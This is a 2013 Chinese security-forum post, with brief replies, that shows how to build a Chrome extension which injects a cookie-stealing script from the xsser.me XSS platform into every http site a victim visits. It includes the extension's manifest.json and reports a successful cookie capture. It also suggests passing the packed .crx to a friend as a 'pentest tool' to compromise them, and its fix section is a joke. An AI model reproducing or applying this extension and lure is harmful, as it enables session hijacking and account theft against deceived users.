首页
论坛
课程
招聘
[分享]Chrome浏览器插件欺骗攻击
2013-4-15 07:28 5215

[分享]Chrome浏览器插件欺骗攻击

2013-4-15 07:28
5215
以前挖了一堆XSS,一开始觉得挺好玩的,后来觉悟了,以后提交就提交那种特别带感的,不好意思,哥,不大清楚应该是什么类型,您帮忙看看吧。。。这个纯属自己无聊时候想出来的,也不知道能不能通过。。。

Chrome插件开发,通过恶意的Chrome插件执行达到劫持整个浏览器,凡是通过chrome浏览器登陆的网站自动发送COOKIE。
在开始之前先来点chrome插件开发上的基础,开发一个chrome插件需要几个文件。
主文件 manifest.json (类似配置文件) 这次使用的manifest是:

{
   "name": "ThE WorLd",    //名字
   "version": "1.0",      //版本
   "manifest_version": 2,     //这个必须有
   "icons":{"128":"smile.gif"},   //图标
   "content_scripts":[         //设定javascript与网站的通信
      {
        "matches":["http://*/*"],  //设定与插件js通信的域 http://*/* 指任意网站
        "js":["location.js"]  //恶意js脚本
      }
   ],
   "description": "TEST",   //备注一样的玩意
   "browser_action": {    //图标
     "default_icon": {                 
       "19": "icon.gif",        
       "38": "smile.gif"            
     },
     "default_title":"ThE WorLd",     
     "default_popup": "popup.html"    //弹出窗口  
   }
}
content_scripts 这个是重点选项,可以设定网站与javascript的通信,这里我们设定了任意网址,如果只是想盗取比如微博的cookie只要设定 类似http://t.qq.com/* 就行,后面我们用上xsser.me 的js脚本。为了达到更好的欺骗效果,我们还得美化下popup.html。
不过这里我就不弄了,我不会美化。。。简单写两。

<h2>WOOYUN</h2>
最后使用到的就是一下几个玩意:http://www.2cto.com/uploadfile/2013/0413/20130413125309394.jpg

然后通过chrome导入插件。
http://www.2cto.com/uploadfile/2013/0413/20130413125309556.jpg

最后我们用chrome登陆几个网站看看。http://www.2cto.com/uploadfile/2013/0413/20130413125309511.jpg

最后登入XSSER 截取cookie成功。
http://www.2cto.com/uploadfile/2013/0413/20130413125310626.jpg

最后我们**地用chrome生成插件。

http://www.2cto.com/uploadfile/2013/0413/20130413125311218.jpg

吧下面那个.crx**的给别人,说,哥们,哥发现了一渗透神器........然后 她GAME OVER

修复方案:

小心这类玩意就是了...........
哥 可以的话给加个精华行不。。。。。

[2023春季班]《安卓高级研修班(网课)》月薪两万班招生中~

收藏
点赞0
打赏
分享
最新回复 (4)
雪    币: 129
活跃值: 活跃值 (187)
能力值: ( LV8,RANK:120 )
在线值:
发帖
回帖
粉丝
透明色 活跃值 2 2013-4-15 07:35
2
0
强帖  占个板凳先
雪    币: 5833
活跃值: 活跃值 (2751)
能力值: ( LV6,RANK:96 )
在线值:
发帖
回帖
粉丝
Imyang 活跃值 1 2013-4-15 08:57
3
0
图片看不到.
雪    币: 2923
活跃值: 活跃值 (565)
能力值: ( LV4,RANK:40 )
在线值:
发帖
回帖
粉丝
CRoot 活跃值 2013-4-15 09:08
4
0
刚睡醒——瞧瞧
雪    币: 933
活跃值: 活跃值 (900)
能力值: ( LV6,RANK:90 )
在线值:
发帖
回帖
粉丝
elianmeng 活跃值 1 2013-4-15 09:36
5
0
你都能控制别人安装你的插件了,还有什么不能做的,其他不就是功能开发吗?
关键是 怎么控制对方安装你的东西,并且你还要实时监控别人卸载你的插件的一个东西出来,这个东西就是所谓的病毒
游客
登录 | 注册 方可回帖
返回